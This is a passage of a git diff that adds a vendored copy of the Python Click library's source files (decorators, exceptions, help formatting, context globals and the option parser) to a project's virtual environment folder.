and the ``%(package)s`` + value for messages. + + .. versionchanged:: 8.0 + Use :mod:`importlib.metadata` instead of ``pkg_resources``. The + version is detected based on the package name, not the entry + point name. The Python package name must match the installed + package name, or be passed with ``package_name=``. + """ + if message is None: + message = _("%(prog)s, version %(version)s") + + if version is None and package_name is None: + frame = inspect.currentframe() + f_back = frame.f_back if frame is not None else None + f_globals = f_back.f_globals if f_back is not None else None + # break reference cycle + # https://docs.python.org/3/library/inspect.html#the-interpreter-stack + del frame + + if f_globals is not None: + package_name = f_globals.get("__name__") + + if package_name == "__main__": + package_name = f_globals.get("__package__") + + if package_name: + package_name = package_name.partition(".")[0] + + def callback(ctx: Context, param: Parameter, value: bool) -> None: + if not value or ctx.resilient_parsing: + return + + nonlocal prog_name + nonlocal version + + if prog_name is None: + prog_name = ctx.find_root().info_name + + if version is None and package_name is not None: + metadata: t.Optional[types.ModuleType] + + try: + from importlib import metadata # type: ignore + except ImportError: + # Python < 3.8 + import importlib_metadata as metadata # type: ignore + + try: + version = metadata.version(package_name) # type: ignore + except metadata.PackageNotFoundError: # type: ignore + raise RuntimeError( + f"{package_name!r} is not installed. Try passing" + " 'package_name' instead." + ) from None + + if version is None: + raise RuntimeError( + f"Could not determine the version for {package_name!r} automatically." + ) + + echo( + message % {"prog": prog_name, "package": package_name, "version": version}, + color=ctx.color, + ) + ctx.exit() + + if not param_decls: + param_decls = ("--version",) + + kwargs.setdefault("is_flag", True) + kwargs.setdefault("expose_value", False) + kwargs.setdefault("is_eager", True) + kwargs.setdefault("help", _("Show the version and exit.")) + kwargs["callback"] = callback + return option(*param_decls, **kwargs) + + +def help_option(*param_decls: str, **kwargs: t.Any) -> t.Callable[[FC], FC]: + """Add a ``--help`` option which immediately prints the help page + and exits the program. + + This is usually unnecessary, as the ``--help`` option is added to + each command automatically unless ``add_help_option=False`` is + passed. + + :param param_decls: One or more option names. Defaults to the single + value ``"--help"``. + :param kwargs: Extra arguments are passed to :func:`option`. + """ + + def callback(ctx: Context, param: Parameter, value: bool) -> None: + if not value or ctx.resilient_parsing: + return + + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + if not param_decls: + param_decls = ("--help",) + + kwargs.setdefault("is_flag", True) + kwargs.setdefault("expose_value", False) + kwargs.setdefault("is_eager", True) + kwargs.setdefault("help", _("Show this message and exit.")) + kwargs["callback"] = callback + return option(*param_decls, **kwargs) diff --git a/env/Lib/site-packages/click/exceptions.py b/env/Lib/site-packages/click/exceptions.py new file mode 100644 index 00000000..fe68a361 --- /dev/null +++ b/env/Lib/site-packages/click/exceptions.py @@ -0,0 +1,288 @@ +import typing as t +from gettext import gettext as _ +from gettext import ngettext + +from ._compat import get_text_stderr +from .utils import echo +from .utils import format_filename + +if t.TYPE_CHECKING: + from .core import Command + from .core import Context + from .core import Parameter + + +def _join_param_hints( + param_hint: t.Optional[t.Union[t.Sequence[str], str]] +) -> t.Optional[str]: + if param_hint is not None and not isinstance(param_hint, str): + return " / ".join(repr(x) for x in param_hint) + + return param_hint + + +class ClickException(Exception): + """An exception that Click can handle and show to the user.""" + + #: The exit code for this exception. + exit_code = 1 + + def __init__(self, message: str) -> None: + super().__init__(message) + self.message = message + + def format_message(self) -> str: + return self.message + + def __str__(self) -> str: + return self.message + + def show(self, file: t.Optional[t.IO[t.Any]] = None) -> None: + if file is None: + file = get_text_stderr() + + echo(_("Error: {message}").format(message=self.format_message()), file=file) + + +class UsageError(ClickException): + """An internal exception that signals a usage error. This typically + aborts any further handling. + + :param message: the error message to display. + :param ctx: optionally the context that caused this error. Click will + fill in the context automatically in some situations. + """ + + exit_code = 2 + + def __init__(self, message: str, ctx: t.Optional["Context"] = None) -> None: + super().__init__(message) + self.ctx = ctx + self.cmd: t.Optional["Command"] = self.ctx.command if self.ctx else None + + def show(self, file: t.Optional[t.IO[t.Any]] = None) -> None: + if file is None: + file = get_text_stderr() + color = None + hint = "" + if ( + self.ctx is not None + and self.ctx.command.get_help_option(self.ctx) is not None + ): + hint = _("Try '{command} {option}' for help.").format( + command=self.ctx.command_path, option=self.ctx.help_option_names[0] + ) + hint = f"{hint}\n" + if self.ctx is not None: + color = self.ctx.color + echo(f"{self.ctx.get_usage()}\n{hint}", file=file, color=color) + echo( + _("Error: {message}").format(message=self.format_message()), + file=file, + color=color, + ) + + +class BadParameter(UsageError): + """An exception that formats out a standardized error message for a + bad parameter. This is useful when thrown from a callback or type as + Click will attach contextual information to it (for instance, which + parameter it is). + + .. versionadded:: 2.0 + + :param param: the parameter object that caused this error. This can + be left out, and Click will attach this info itself + if possible. + :param param_hint: a string that shows up as parameter name. This + can be used as alternative to `param` in cases + where custom validation should happen. If it is + a string it's used as such, if it's a list then + each item is quoted and separated. + """ + + def __init__( + self, + message: str, + ctx: t.Optional["Context"] = None, + param: t.Optional["Parameter"] = None, + param_hint: t.Optional[str] = None, + ) -> None: + super().__init__(message, ctx) + self.param = param + self.param_hint = param_hint + + def format_message(self) -> str: + if self.param_hint is not None: + param_hint = self.param_hint + elif self.param is not None: + param_hint = self.param.get_error_hint(self.ctx) # type: ignore + else: + return _("Invalid value: {message}").format(message=self.message) + + return _("Invalid value for {param_hint}: {message}").format( + param_hint=_join_param_hints(param_hint), message=self.message + ) + + +class MissingParameter(BadParameter): + """Raised if click required an option or argument but it was not + provided when invoking the script. + + .. versionadded:: 4.0 + + :param param_type: a string that indicates the type of the parameter. + The default is to inherit the parameter type from + the given `param`. Valid values are ``'parameter'``, + ``'option'`` or ``'argument'``. + """ + + def __init__( + self, + message: t.Optional[str] = None, + ctx: t.Optional["Context"] = None, + param: t.Optional["Parameter"] = None, + param_hint: t.Optional[str] = None, + param_type: t.Optional[str] = None, + ) -> None: + super().__init__(message or "", ctx, param, param_hint) + self.param_type = param_type + + def format_message(self) -> str: + if self.param_hint is not None: + param_hint: t.Optional[str] = self.param_hint + elif self.param is not None: + param_hint = self.param.get_error_hint(self.ctx) # type: ignore + else: + param_hint = None + + param_hint = _join_param_hints(param_hint) + param_hint = f" {param_hint}" if param_hint else "" + + param_type = self.param_type + if param_type is None and self.param is not None: + param_type = self.param.param_type_name + + msg = self.message + if self.param is not None: + msg_extra = self.param.type.get_missing_message(self.param) + if msg_extra: + if msg: + msg += f". {msg_extra}" + else: + msg = msg_extra + + msg = f" {msg}" if msg else "" + + # Translate param_type for known types. + if param_type == "argument": + missing = _("Missing argument") + elif param_type == "option": + missing = _("Missing option") + elif param_type == "parameter": + missing = _("Missing parameter") + else: + missing = _("Missing {param_type}").format(param_type=param_type) + + return f"{missing}{param_hint}.{msg}" + + def __str__(self) -> str: + if not self.message: + param_name = self.param.name if self.param else None + return _("Missing parameter: {param_name}").format(param_name=param_name) + else: + return self.message + + +class NoSuchOption(UsageError): + """Raised if click attempted to handle an option that does not + exist. + + .. versionadded:: 4.0 + """ + + def __init__( + self, + option_name: str, + message: t.Optional[str] = None, + possibilities: t.Optional[t.Sequence[str]] = None, + ctx: t.Optional["Context"] = None, + ) -> None: + if message is None: + message = _("No such option: {name}").format(name=option_name) + + super().__init__(message, ctx) + self.option_name = option_name + self.possibilities = possibilities + + def format_message(self) -> str: + if not self.possibilities: + return self.message + + possibility_str = ", ".join(sorted(self.possibilities)) + suggest = ngettext( + "Did you mean {possibility}?", + "(Possible options: {possibilities})", + len(self.possibilities), + ).format(possibility=possibility_str, possibilities=possibility_str) + return f"{self.message} {suggest}" + + +class BadOptionUsage(UsageError): + """Raised if an option is generally supplied but the use of the option + was incorrect. This is for instance raised if the number of arguments + for an option is not correct. + + .. versionadded:: 4.0 + + :param option_name: the name of the option being used incorrectly. + """ + + def __init__( + self, option_name: str, message: str, ctx: t.Optional["Context"] = None + ) -> None: + super().__init__(message, ctx) + self.option_name = option_name + + +class BadArgumentUsage(UsageError): + """Raised if an argument is generally supplied but the use of the argument + was incorrect. This is for instance raised if the number of values + for an argument is not correct. + + .. versionadded:: 6.0 + """ + + +class FileError(ClickException): + """Raised if a file cannot be opened.""" + + def __init__(self, filename: str, hint: t.Optional[str] = None) -> None: + if hint is None: + hint = _("unknown error") + + super().__init__(hint) + self.ui_filename: str = format_filename(filename) + self.filename = filename + + def format_message(self) -> str: + return _("Could not open file {filename!r}: {message}").format( + filename=self.ui_filename, message=self.message + ) + + +class Abort(RuntimeError): + """An internal signalling exception that signals Click to abort.""" + + +class Exit(RuntimeError): + """An exception that indicates that the application should exit with some + status code. + + :param code: the status code to exit with. + """ + + __slots__ = ("exit_code",) + + def __init__(self, code: int = 0) -> None: + self.exit_code: int = code diff --git a/env/Lib/site-packages/click/formatting.py b/env/Lib/site-packages/click/formatting.py new file mode 100644 index 00000000..ddd2a2f8 --- /dev/null +++ b/env/Lib/site-packages/click/formatting.py @@ -0,0 +1,301 @@ +import typing as t +from contextlib import contextmanager +from gettext import gettext as _ + +from ._compat import term_len +from .parser import split_opt + +# Can force a width. This is used by the test system +FORCED_WIDTH: t.Optional[int] = None + + +def measure_table(rows: t.Iterable[t.Tuple[str, str]]) -> t.Tuple[int, ...]: + widths: t.Dict[int, int] = {} + + for row in rows: + for idx, col in enumerate(row): + widths[idx] = max(widths.get(idx, 0), term_len(col)) + + return tuple(y for x, y in sorted(widths.items())) + + +def iter_rows( + rows: t.Iterable[t.Tuple[str, str]], col_count: int +) -> t.Iterator[t.Tuple[str, ...]]: + for row in rows: + yield row + ("",) * (col_count - len(row)) + + +def wrap_text( + text: str, + width: int = 78, + initial_indent: str = "", + subsequent_indent: str = "", + preserve_paragraphs: bool = False, +) -> str: + """A helper function that intelligently wraps text. By default, it + assumes that it operates on a single paragraph of text but if the + `preserve_paragraphs` parameter is provided it will intelligently + handle paragraphs (defined by two empty lines). + + If paragraphs are handled, a paragraph can be prefixed with an empty + line containing the ``\\b`` character (``\\x08``) to indicate that + no rewrapping should happen in that block. + + :param text: the text that should be rewrapped. + :param width: the maximum width for the text. + :param initial_indent: the initial indent that should be placed on the + first line as a string. + :param subsequent_indent: the indent string that should be placed on + each consecutive line. + :param preserve_paragraphs: if this flag is set then the wrapping will + intelligently handle paragraphs. + """ + from ._textwrap import TextWrapper + + text = text.expandtabs() + wrapper = TextWrapper( + width, + initial_indent=initial_indent, + subsequent_indent=subsequent_indent, + replace_whitespace=False, + ) + if not preserve_paragraphs: + return wrapper.fill(text) + + p: t.List[t.Tuple[int, bool, str]] = [] + buf: t.List[str] = [] + indent = None + + def _flush_par() -> None: + if not buf: + return + if buf[0].strip() == "\b": + p.append((indent or 0, True, "\n".join(buf[1:]))) + else: + p.append((indent or 0, False, " ".join(buf))) + del buf[:] + + for line in text.splitlines(): + if not line: + _flush_par() + indent = None + else: + if indent is None: + orig_len = term_len(line) + line = line.lstrip() + indent = orig_len - term_len(line) + buf.append(line) + _flush_par() + + rv = [] + for indent, raw, text in p: + with wrapper.extra_indent(" " * indent): + if raw: + rv.append(wrapper.indent_only(text)) + else: + rv.append(wrapper.fill(text)) + + return "\n\n".join(rv) + + +class HelpFormatter: + """This class helps with formatting text-based help pages. It's + usually just needed for very special internal cases, but it's also + exposed so that developers can write their own fancy outputs. + + At present, it always writes into memory. + + :param indent_increment: the additional increment for each level. + :param width: the width for the text. This defaults to the terminal + width clamped to a maximum of 78. + """ + + def __init__( + self, + indent_increment: int = 2, + width: t.Optional[int] = None, + max_width: t.Optional[int] = None, + ) -> None: + import shutil + + self.indent_increment = indent_increment + if max_width is None: + max_width = 80 + if width is None: + width = FORCED_WIDTH + if width is None: + width = max(min(shutil.get_terminal_size().columns, max_width) - 2, 50) + self.width = width + self.current_indent = 0 + self.buffer: t.List[str] = [] + + def write(self, string: str) -> None: + """Writes a unicode string into the internal buffer.""" + self.buffer.append(string) + + def indent(self) -> None: + """Increases the indentation.""" + self.current_indent += self.indent_increment + + def dedent(self) -> None: + """Decreases the indentation.""" + self.current_indent -= self.indent_increment + + def write_usage( + self, prog: str, args: str = "", prefix: t.Optional[str] = None + ) -> None: + """Writes a usage line into the buffer. + + :param prog: the program name. + :param args: whitespace separated list of arguments. + :param prefix: The prefix for the first line. Defaults to + ``"Usage: "``. + """ + if prefix is None: + prefix = f"{_('Usage:')} " + + usage_prefix = f"{prefix:>{self.current_indent}}{prog} " + text_width = self.width - self.current_indent + + if text_width >= (term_len(usage_prefix) + 20): + # The arguments will fit to the right of the prefix. + indent = " " * term_len(usage_prefix) + self.write( + wrap_text( + args, + text_width, + initial_indent=usage_prefix, + subsequent_indent=indent, + ) + ) + else: + # The prefix is too long, put the arguments on the next line. + self.write(usage_prefix) + self.write("\n") + indent = " " * (max(self.current_indent, term_len(prefix)) + 4) + self.write( + wrap_text( + args, text_width, initial_indent=indent, subsequent_indent=indent + ) + ) + + self.write("\n") + + def write_heading(self, heading: str) -> None: + """Writes a heading into the buffer.""" + self.write(f"{'':>{self.current_indent}}{heading}:\n") + + def write_paragraph(self) -> None: + """Writes a paragraph into the buffer.""" + if self.buffer: + self.write("\n") + + def write_text(self, text: str) -> None: + """Writes re-indented text into the buffer. This rewraps and + preserves paragraphs. + """ + indent = " " * self.current_indent + self.write( + wrap_text( + text, + self.width, + initial_indent=indent, + subsequent_indent=indent, + preserve_paragraphs=True, + ) + ) + self.write("\n") + + def write_dl( + self, + rows: t.Sequence[t.Tuple[str, str]], + col_max: int = 30, + col_spacing: int = 2, + ) -> None: + """Writes a definition list into the buffer. This is how options + and commands are usually formatted. + + :param rows: a list of two item tuples for the terms and values. + :param col_max: the maximum width of the first column. + :param col_spacing: the number of spaces between the first and + second column. + """ + rows = list(rows) + widths = measure_table(rows) + if len(widths) != 2: + raise TypeError("Expected two columns for definition list") + + first_col = min(widths[0], col_max) + col_spacing + + for first, second in iter_rows(rows, len(widths)): + self.write(f"{'':>{self.current_indent}}{first}") + if not second: + self.write("\n") + continue + if term_len(first) <= first_col - col_spacing: + self.write(" " * (first_col - term_len(first))) + else: + self.write("\n") + self.write(" " * (first_col + self.current_indent)) + + text_width = max(self.width - first_col - 2, 10) + wrapped_text = wrap_text(second, text_width, preserve_paragraphs=True) + lines = wrapped_text.splitlines() + + if lines: + self.write(f"{lines[0]}\n") + + for line in lines[1:]: + self.write(f"{'':>{first_col + self.current_indent}}{line}\n") + else: + self.write("\n") + + @contextmanager + def section(self, name: str) -> t.Iterator[None]: + """Helpful context manager that writes a paragraph, a heading, + and the indents. + + :param name: the section name that is written as heading. + """ + self.write_paragraph() + self.write_heading(name) + self.indent() + try: + yield + finally: + self.dedent() + + @contextmanager + def indentation(self) -> t.Iterator[None]: + """A context manager that increases the indentation.""" + self.indent() + try: + yield + finally: + self.dedent() + + def getvalue(self) -> str: + """Returns the buffer contents.""" + return "".join(self.buffer) + + +def join_options(options: t.Sequence[str]) -> t.Tuple[str, bool]: + """Given a list of option strings this joins them in the most appropriate + way and returns them in the form ``(formatted_string, + any_prefix_is_slash)`` where the second item in the tuple is a flag that + indicates if any of the option prefixes was a slash. + """ + rv = [] + any_prefix_is_slash = False + + for opt in options: + prefix = split_opt(opt)[0] + + if prefix == "/": + any_prefix_is_slash = True + + rv.append((len(prefix), opt)) + + rv.sort(key=lambda x: x[0]) + return ", ".join(x[1] for x in rv), any_prefix_is_slash diff --git a/env/Lib/site-packages/click/globals.py b/env/Lib/site-packages/click/globals.py new file mode 100644 index 00000000..480058f1 --- /dev/null +++ b/env/Lib/site-packages/click/globals.py @@ -0,0 +1,68 @@ +import typing as t +from threading import local + +if t.TYPE_CHECKING: + import typing_extensions as te + from .core import Context + +_local = local() + + +@t.overload +def get_current_context(silent: "te.Literal[False]" = False) -> "Context": + ... + + +@t.overload +def get_current_context(silent: bool = ...) -> t.Optional["Context"]: + ... + + +def get_current_context(silent: bool = False) -> t.Optional["Context"]: + """Returns the current click context. This can be used as a way to + access the current context object from anywhere. This is a more implicit + alternative to the :func:`pass_context` decorator. This function is + primarily useful for helpers such as :func:`echo` which might be + interested in changing its behavior based on the current context. + + To push the current context, :meth:`Context.scope` can be used. + + .. versionadded:: 5.0 + + :param silent: if set to `True` the return value is `None` if no context + is available. The default behavior is to raise a + :exc:`RuntimeError`. + """ + try: + return t.cast("Context", _local.stack[-1]) + except (AttributeError, IndexError) as e: + if not silent: + raise RuntimeError("There is no active click context.") from e + + return None + + +def push_context(ctx: "Context") -> None: + """Pushes a new context to the current stack.""" + _local.__dict__.setdefault("stack", []).append(ctx) + + +def pop_context() -> None: + """Removes the top level from the stack.""" + _local.stack.pop() + + +def resolve_color_default(color: t.Optional[bool] = None) -> t.Optional[bool]: + """Internal helper to get the default value of the color flag. If a + value is passed it's returned unchanged, otherwise it's looked up from + the current context. + """ + if color is not None: + return color + + ctx = get_current_context(silent=True) + + if ctx is not None: + return ctx.color + + return None diff --git a/env/Lib/site-packages/click/parser.py b/env/Lib/site-packages/click/parser.py new file mode 100644 index 00000000..5fa7adfa --- /dev/null +++ b/env/Lib/site-packages/click/parser.py @@ -0,0 +1,529 @@ +""" +This module started out as largely a copy paste from the stdlib's +optparse module with the features removed that we do not need from +optparse because we implement them in Click on a higher level (for +instance type handling, help formatting and a lot more). + +The plan is to remove more and more from here over time. + +The reason this is a different module and not optparse from the stdlib +is that there are differences in 2.x and 3.x about the error messages +generated and optparse in the stdlib uses gettext for no good reason +and might cause us issues. + +Click uses parts of optparse written by Gregory P. Ward and maintained +by the Python Software Foundation. This is limited to code in parser.py. + +Copyright 2001-2006 Gregory P. Ward. All rights reserved. +Copyright 2002-2006 Python Software Foundation. All rights reserved. +""" +# This code uses parts of optparse written by Gregory P. Ward and +# maintained by the Python Software Foundation. +# Copyright 2001-2006 Gregory P. Ward +# Copyright 2002-2006 Python Software Foundation +import typing as t +from collections import deque +from gettext import gettext as _ +from gettext import ngettext + +from .exceptions import BadArgumentUsage +from .exceptions import BadOptionUsage +from .exceptions import NoSuchOption +from .exceptions import UsageError + +if t.TYPE_CHECKING: + import typing_extensions as te + from .core import Argument as CoreArgument + from .core import Context + from .core import Option as CoreOption + from .core import Parameter as CoreParameter + +V = t.TypeVar("V") + +# Sentinel value that indicates an option was passed as a flag without a +# value but is not a flag option. Option.consume_value uses this to +# prompt or use the flag_value. +_flag_needs_value = object() + + +def _unpack_args( + args: t.Sequence[str], nargs_spec: t.Sequence[int] +) -> t.Tuple[t.Sequence[t.Union[str, t.Sequence[t.Optional[str]], None]], t.List[str]]: + """Given an iterable of arguments and an iterable of nargs specifications, + it returns a tuple with all the unpacked arguments at the first index + and all remaining arguments as the second. + + The nargs specification is the number of arguments that should be consumed + or `-1` to indicate that this position should eat up all the remainders. + + Missing items are filled with `None`. + """ + args = deque(args) + nargs_spec = deque(nargs_spec) + rv: t.List[t.Union[str, t.Tuple[t.Optional[str], ...], None]] = [] + spos: t.Optional[int] = None + + def _fetch(c: "te.Deque[V]") -> t.Optional[V]: + try: + if spos is None: + return c.popleft() + else: + return c.pop() + except IndexError: + return None + + while nargs_spec: + nargs = _fetch(nargs_spec) + + if nargs is None: + continue + + if nargs == 1: + rv.append(_fetch(args)) + elif nargs > 1: + x = [_fetch(args) for _ in range(nargs)] + + # If we're reversed, we're pulling in the arguments in reverse, + # so we need to turn them around. + if spos is not None: + x.reverse() + + rv.append(tuple(x)) + elif nargs < 0: + if spos is not None: + raise TypeError("Cannot have two nargs < 0") + + spos = len(rv) + rv.append(None) + + # spos is the position of the wildcard (star). If it's not `None`, + # we fill it with the remainder. + if spos is not None: + rv[spos] = tuple(args) + args = [] + rv[spos + 1 :] = reversed(rv[spos + 1 :]) + + return tuple(rv), list(args) + + +def split_opt(opt: str) -> t.Tuple[str, str]: + first = opt[:1] + if first.isalnum(): + return "", opt + if opt[1:2] == first: + return opt[:2], opt[2:] + return first, opt[1:] + + +def normalize_opt(opt: str, ctx: t.Optional["Context"]) -> str: + if ctx is None or ctx.token_normalize_func is None: + return opt + prefix, opt = split_opt(opt) + return f"{prefix}{ctx.token_normalize_func(opt)}" + + +def split_arg_string(string: str) -> t.List[str]: + """Split an argument string as with :func:`shlex.split`, but don't + fail if the string is incomplete. Ignores a missing closing quote or + incomplete escape sequence and uses the partial token as-is. + + .. code-block:: python + + split_arg_string("example 'my file") + ["example", "my file"] + + split_arg_string("example my\\") + ["example", "my"] + + :param string: String to split. + """ + import shlex + + lex = shlex.shlex(string, posix=True) + lex.whitespace_split = True + lex.commenters = "" + out = [] + + try: + for token in lex: + out.append(token) + except ValueError: + # Raised when end-of-string is reached in an invalid state. Use + # the partial token as-is. The quote or escape character is in + # lex.state, not lex.token. + out.append(lex.token) + + return out + + +class Option: + def __init__( + self, + obj: "CoreOption", + opts: t.Sequence[str], + dest: t.Optional[str], + action: t.Optional[str] = None, + nargs: int = 1, + const: t.Optional[t.Any] = None, + ): + self._short_opts = [] + self._long_opts = [] + self.prefixes: t.Set[str] = set() + + for opt in opts: + prefix, value = split_opt(opt) + if not prefix: + raise ValueError(f"Invalid start character for option ({opt})") + self.prefixes.add(prefix[0]) + if len(prefix) == 1 and len(value) == 1: + self._short_opts.append(opt) + else: + self._long_opts.append(opt) + self.prefixes.add(prefix) + + if action is None: + action = "store" + + self.dest = dest + self.action = action + self.nargs = nargs + self.const = const + self.obj = obj + + @property + def takes_value(self) -> bool: + return self.action in ("store", "append") + + def process(self, value: t.Any, state: "ParsingState") -> None: + if self.action == "store": + state.opts[self.dest] = value # type: ignore + elif self.action == "store_const": + state.opts[self.dest] = self.const # type: ignore + elif self.action == "append": + state.opts.setdefault(self.dest, []).append(value) # type: ignore + elif self.action == "append_const": + state.opts.setdefault(self.dest, []).append(self.const) # type: ignore + elif self.action == "count": + state.opts[self.dest] = state.opts.get(self.dest, 0) + 1 # type: ignore + else: + raise ValueError(f"unknown action '{self.action}'") + state.order.append(self.obj) + + +class Argument: + def __init__(self, obj: "CoreArgument", dest: t.Optional[str], nargs: int = 1): + self.dest = dest + self.nargs = nargs + self.obj = obj + + def process( + self, + value: t.Union[t.Optional[str], t.Sequence[t.Optional[str]]], + state: "ParsingState", + ) -> None: + if self.nargs > 1: + assert value is not None + holes = sum(1 for x in value if x is None) + if holes == len(value): + value = None + elif holes != 0: + raise BadArgumentUsage( + _("Argument {name!r} takes {nargs} values.").format( + name=self.dest, nargs=self.nargs + ) + ) + + if self.nargs == -1 and self.obj.envvar is not None and value == (): + # Replace empty tuple with None so that a value from the + # environment may be tried. + value = None + + state.opts[self.dest] = value # type: ignore + state.order.append(self.obj) + + +class ParsingState: + def __init__(self, rargs: t.List[str]) -> None: + self.opts: t.Dict[str, t.Any] = {} + self.largs: t.List[str] = [] + self.rargs = rargs + self.order: t.List["CoreParameter"] = [] + + +class OptionParser: + """The option parser is an internal class that is ultimately used to + parse options and arguments. It's modelled after optparse and brings + a similar but vastly simplified API. It should generally not be used + directly as the high level Click classes wrap it for you. + + It's not nearly as extensible as optparse or argparse as it does not + implement features that are implemented on a higher level (such as + types or defaults). + + :param ctx: optionally the :class:`~click.Context` where this parser + should go with. + """ + + def __init__(self, ctx: t.Optional["Context"] = None) -> None: + #: The :class:`~click.Context` for this parser. This might be + #: `None` for some advanced use cases. + self.ctx = ctx + #: This controls how the parser deals with interspersed arguments. + #: If this is set to `False`, the parser will stop on the first + #: non-option. Click uses this to implement nested subcommands + #: safely. + self.allow_interspersed_args: bool = True + #: This tells the parser how to deal with unknown options. By + #: default it will error out (which is sensible), but there is a + #: second mode where it will ignore it and continue processing + #: after shifting all the unknown options into the resulting args. + self.ignore_unknown_options: bool = False + + if ctx is not None: + self.allow_interspersed_args = ctx.allow_interspersed_args + self.ignore_unknown_options = ctx.ignore_unknown_options + + self._short_opt: t.Dict[str, Option] = {} + self._long_opt: t.Dict[str, Option] = {} + self._opt_prefixes = {"-", "--"} + self._args: t.List[Argument] = [] + + def add_option( + self, + obj: "CoreOption", + opts: t.Sequence[str], + dest: t.Optional[str], + action: t.Optional[str] = None, + nargs: int = 1, + const: t.Optional[t.Any] = None, + ) -> None: + """Adds a new option named `dest` to the parser. The destination + is not inferred (unlike with optparse) and needs to be explicitly + provided. Action can be any of ``store``, ``store_const``, + ``append``, ``append_const`` or ``count``. + + The `obj` can be used to identify the option in the order list + that is returned from the parser. + """ + opts = [normalize_opt(opt, self.ctx) for opt in opts] + option = Option(obj, opts, dest, action=action, nargs=nargs, const=const) + self._opt_prefixes.update(option.prefixes) + for opt in option._short_opts: + self._short_opt[opt] = option + for opt in option._long_opts: + self._long_opt[opt] = option + + def add_argument( + self, obj: "CoreArgument", dest: t.Optional[str], nargs: int = 1 + ) -> None: + """Adds a positional argument named `dest` to the parser. + + The `obj` can be used to identify the option in the order list + that is returned from the parser. + """ + self._args.append(Argument(obj, dest=dest, nargs=nargs)) + + def parse_args( + self, args: t.List[str] + ) -> t.Tuple[t.Dict[str, t.Any], t.List[str], t.List["CoreParameter"]]: + """Parses positional arguments and returns ``(values, args, order)`` + for the parsed options and arguments as well as the leftover + arguments if there are any. The order is a list of objects as they + appear on the command line. If arguments appear multiple times they + will be memorized multiple times as well. + """ + state = ParsingState(args) + try: + self._process_args_for_options(state) + self._process_args_for_args(state) + except UsageError: + if self.ctx is None or not self.ctx.resilient_parsing: + raise + return state.opts, state.largs, state.order + + def _process_args_for_args(self, state: ParsingState) -> None: + pargs, args = _unpack_args( + state.largs + state.rargs, [x.nargs for x in self._args] + ) + + for idx, arg in enumerate(self._args): + arg.process(pargs[idx], state) + + state.largs = args + state.rargs = [] + + def _process_args_for_options(self, state: ParsingState) -> None: + while state.rargs: + arg = state.rargs.pop(0) + arglen = len(arg) + # Double dashes always handled explicitly regardless of what + # prefixes are valid. + if arg == "--": + return + elif arg[:1] in self._opt_prefixes and arglen > 1: + self._process_opts(arg, state) + elif self.allow_interspersed_args: + state.largs.append(arg) + else: + state.rargs.insert(0, arg) + return + + # Say this is the original argument list: + # [arg0, arg1, ..., arg(i-1), arg(i), arg(i+1), ..., arg(N-1)] + # ^ + # (we are about to process arg(i)). + # + # Then rargs is [arg(i), ..., arg(N-1)] and largs is a *subset* of + # [arg0, ..., arg(i-1)] (any options and their arguments will have + # been removed from largs). + # + # The while loop will usually consume 1 or more arguments per pass. + # If it consumes 1 (eg. arg is an option that takes no arguments), + # then after _process_arg() is done the situation is: + # + # largs = subset of [arg0, ..., arg(i)] + # rargs = [arg(i+1), ..., arg(N-1)] + # + # If allow_interspersed_args is false, largs will always be + # *empty* -- still a subset of [arg0, ..., arg(i-1)], but + # not a very interesting subset! + + def _match_long_opt( + self, opt: str, explicit_value: t.Optional[str], state: ParsingState + ) -> None: + if opt not in self._long_opt: + from difflib import get_close_matches + + possibilities = get_close_matches(opt, self._long_opt) + raise NoSuchOption(opt, possibilities=possibilities, ctx=self.ctx) + + option = self._long_opt[opt] + if option.takes_value: + # At this point it's safe to modify rargs by injecting the + # explicit value, because no exception is raised in this + # branch. This means that the inserted value will be fully + # consumed. + if explicit_value is not None: + state.rargs.insert(0, explicit_value) + + value = self._get_value_from_state(opt, option, state) + + elif explicit_value is not None: + raise BadOptionUsage( + opt, _("Option {name!r} does not take a value.").format(name=opt) + ) + + else: + value = None + + option.process(value, state) + + def _match_short_opt(self, arg: str, state: ParsingState) -> None: + stop = False + i = 1 + prefix = arg[0] + unknown_options = [] + + for ch in arg[1:]: + opt = normalize_opt(f"{prefix}{ch}", self.ctx) + option = self._short_opt.get(opt) + i += 1 + + if not option: + if self.ignore_unknown_options: + unknown_options.append(ch) + continue + raise NoSuchOption(opt, ctx=self.ctx) + if option.takes_value: + # Any characters left in arg? Pretend they're the + # next arg, and stop consuming characters of arg. + if i < len(arg): + state.rargs.insert(0, arg[i:]) + stop = True + + value = self._get_value_from_state(opt, option, state) + + else: + value = None + + option.process(value, state) + + if stop: + break + + # If we got any unknown options we recombine the string of the + # remaining options and re-attach the prefix, then report that + # to the state as new larg. This way there is basic combinatorics + # that can be achieved while still ignoring unknown arguments. + if self.ignore_unknown_options and unknown_options: + state.largs.append(f"{prefix}{''.join(unknown_options)}") + + def _get_value_from_state( + self, option_name: str, option: Option, state: ParsingState + ) -> t.Any: + nargs = option.nargs + + if len(state.rargs) < nargs: + if option.obj._flag_needs_value: + # Option allows omitting the value. + value = _flag_needs_value + else: + raise BadOptionUsage( + option_name, + ngettext( + "Option {name!r} requires an argument.", + "Option {name!r} requires {nargs} arguments.", + nargs, + ).format(name=option_name, nargs=nargs), + ) + elif nargs == 1: + next_rarg = state.rargs[0] + + if ( + option.obj._flag_needs_value + and isinstance(next_rarg, str) + and next_rarg[:1] in self._opt_prefixes + and len(next_rarg) > 1 + ): + # The next arg looks like the start of an option, don't + # use it as the value if omitting the value is allowed. + value = _flag_needs_value + else: + value = state.rargs.pop(0) + else: + value = tuple(state.rargs[:nargs]) + del state.rargs[:nargs] + + return value + + def _process_opts(self, arg: str, state: ParsingState) -> None: + explicit_value = None + # Long option handling happens in two parts. The first part is + # supporting explicitly attached values. In any case, we will try + # to long match the option first. + if "=" in arg: + long_opt, explicit_value = arg.split("=", 1) + else: + long_opt = arg + norm_long_opt = normalize_opt(long_opt, self.ctx) + + # At this point we will match the (assumed) long option through + # the long option matching code. Note that this allows options + # like "-foo" to be matched as long options. + try: + self._match_long_opt(norm_long_opt, explicit_value, state) + except NoSuchOption: + # At this point the long option matching failed, and we need + # to try with short options. However there is a special rule + # which says, that if we have a two character options prefix + # (applies to "--foo" for instance), we do not dispatch to the + # short option code and will instead raise the no option + # error. + if arg[:2] not in self._opt_prefixes: + self._match_short_opt(arg, state) + return + + if not self.ignore_unknown_options: + raise + + state.largs.append(arg) diff --git a/env/Lib/site-packages/click/py.typed b/env/Lib/site-packages/click/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/click/shell_completion.py b/env/Lib/site-packages/click/shell_completion.py new file mode 100644 index 00000000..dc9e00b9 --- /dev/null +++ 